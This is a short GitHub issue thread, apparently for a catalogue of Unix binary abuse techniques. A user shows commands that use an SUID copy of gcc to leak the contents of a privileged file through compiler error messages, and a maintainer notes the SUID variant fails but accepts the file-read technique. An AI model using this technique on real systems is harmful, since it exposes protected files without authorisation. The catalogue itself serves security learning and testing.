gcc can also be used for file read
NQNStudios opened this issue · 1 comments
NQNStudios commented
While doing the challenges for the first module of pwn.college I found a way to read files with an SUID version of gcc.
Following the format of other examples, this is how to reproduce:
sudo sh -c 'cp $(which gcc) .; chmod +s ./gcc'
LFILE=file_to_read
./gcc -x c "$LFILE"
Assuming the privileged file is not valid C code, much if not all of its lines should be output within syntax error messages.
Is this the kind of example that would be worth adding?
cyrus-and commented
While this might work to read files in general, it fails when SUID with:
gcc: error trying to exec 'cc1': execvp: No such file or directory
I assume that in a system that, for whatever reason, allows to run gcc as SUID this is already taken care of... but anyway, let's just add the file-read function.
Is this the kind of example that would be worth adding?
Yes, please open a PR, we'll resume from that. Thanks!